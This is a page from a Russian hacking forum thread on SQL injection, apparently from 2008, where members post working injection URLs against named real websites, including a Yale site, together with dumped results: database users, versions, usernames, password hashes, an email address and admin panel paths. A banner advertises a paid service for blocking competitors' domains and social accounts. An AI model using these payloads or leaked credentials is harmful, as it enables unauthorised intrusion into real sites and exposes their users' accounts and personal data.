Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 535 из 1242

535

Опции темы

Поиск в этой теме

Опции просмотра

#5341

21.04.2008, 18:03

-=megahertz=-

Участник форума

Регистрация: 23.05.2007

Сообщений: 103

Провел на форуме:
380957

Репутация: 56

Отправить сообщение для -=megahertz=- с помощью ICQ

Интернет телевидение
http://tv-portal.ru/index.php?kanal=-57+UNION+SELECT+1,2,concat(id,0x3a,name,0x3a,pass) ,database(),5,user(),7,8,9,10,version()+from+users +limit+1,1/*
database - dbu_kokos32_1@192.168.3.23
user - db_kokos32_2
version - 4.1.21-log

меняем limit+1(2,3,4...),1/* получаем ИД,Имя,Пароль

#5342

21.04.2008, 20:03

NFM

Постоянный

Регистрация: 16.01.2006

Сообщений: 598

Провел на форуме:
5120686

Репутация: 531

2-=megahertz=- только хз куда эти логины и пассы= )
там авторизаций ничего нету =) а в админку пассы не подходят

#5343

21.04.2008, 20:48

-=megahertz=-

Участник форума

Регистрация: 23.05.2007

Сообщений: 103

Провел на форуме:
380957

Репутация: 56

NFm попробуй подбери другую таблицу... я кроме юзерс ничего не искал...

#5344

21.04.2008, 22:34

kair

Участник форума

Регистрация: 12.10.2006

Сообщений: 158

Провел на форуме:
668286

Репутация: 187

Отправить сообщение для kair с помощью ICQ

Код:

ht_tp://uskniedernsill.us.funpic.de/AllMyGuests0.4.1/index.php?AMG_open=comments&AMG_id=111%20UNION+SELECT+1,2,3,%20concat_ws(0x203a20,user_name,user_password,user_email),5,6,7+from+allmyphp_user+where+user_id=1--

stefanhofer : e8cd3fd55a1f0100bb692431c649844c :fc_niedernsill@yahoo.de
Пробую вскрыть хэш!!!

Последний раз редактировалось kair; 21.04.2008 в 22:42..

#5345

22.04.2008, 04:23

AkyHa_MaTaTa

Постоянный

Регистрация: 19.03.2007

Сообщений: 684

Провел на форуме:
3152874

Репутация: 1020

Отправить сообщение для AkyHa_MaTaTa с помощью ICQ

http://rwjcsp.yale.edu/community.php?id=123123123+union+select+1,concat_w s(0x2f,version(),database(),user()),3,4,5,6,7,8,9, 10,11,12,13,14,15,id,17,18,20,21,22,23,24,25+from+ users+limit+1,1/*
version() : 4.0.24-log database():rwj user(): rwjEditor@web.med.yale.edu

http://rwjcsp.yale.edu/community.php?id=123123123+union+select+1,password ,3,4,5,6,7,8,9,10,11,12,13,14,15,id,17,18,20,21,22 ,23,24,25+from+users+limit+1,1/*

http://www.moscowbooks.ru/news/view.asp?id=-1+or+1=@@version--

Последний раз редактировалось AkyHa_MaTaTa; 22.04.2008 в 06:20..

#5346

22.04.2008, 12:18

gibson

Moderator - Level 7

Регистрация: 24.02.2006

Сообщений: 447

Провел на форуме:
2872049

Репутация: 705

Отправить сообщение для gibson с помощью ICQ

http://www.preproject.com/news%20manager/admin/view_news.php?catid=[sql]

Цитата:

-1+union+select+1,2,3,concat_ws(%22:%22,id,login,pa ssword),5,6,7+from+admin/*

http://www.preproject.com/news%20manager/index.php?id=[sql]

Цитата:

-1+union+select+1,2,3,4,concat_ws(%22:%22,id,login, password),6,7+from+admin/*

ps скуля в демо двиге!

#5347

22.04.2008, 19:16

symbioin

Познающий

Регистрация: 06.08.2007

Сообщений: 84

Провел на форуме:
373338

Репутация: 25

Отправить сообщение для symbioin с помощью ICQ

http://auction.ua/auctions/one.htm?parent=-3242

#5348

22.04.2008, 19:51

159932

Постоянный

Регистрация: 28.09.2007

Сообщений: 820

Провел на форуме:
6722038

Репутация: 1385

Цитата:

http://www.mognet.net/projectinfo.php?id=-29+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,use rname,user_password),0,1+from+mognetforum.phpbb_us ers/*
http://www.mognet.net/projectinfo.php?id=-29+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,adm inlogin,admin,username,password),0,1+from+projectq ueue.user/*

Kumama:04f83a9025d99b309b427d9bde172fb7
Stiltzkin:4e25f9875fd790f28dfc8e97da43aece:SailorV8
mognet.net/admin
mognet.net/forum/admin

#5349

22.04.2008, 21:32

.acme

Участник форума

Регистрация: 08.11.2007

Сообщений: 102

Провел на форуме:
1266776

Репутация: 93

Цитата:

http://www.tkastrey.ru/brand.php?id=-1+union+select+1,2,3,4,concat(user,0x3,password)+f rom+mysql.user--

user: site@zvm11.host.ru
db: astrey
version: 4.0.27

root0bcb2a3b366d4f3c
site5187d56e009fb910

Хэши не сбручены, но поставлены в очередь на hashcracking.info

#5350

22.04.2008, 22:37

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Отправить сообщение для Scipio с помощью ICQ

Код:

http://www.itsecurityportal.com/itsecurity_directory.asp?SearchString=a%')+and+1=@@version--

Код:

http://www.itsecurityportal.com/itsecurity_job_detail.asp?jobid=111+and+1=@@version

на серве несколько сайтов, все они узявимы в этих сриптах, единственное что, это меняется самый первый префикс, в зависимости от имени сайта

__________________
Карфаген должен быть разрушен...

Страница 535 из 1242

535

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход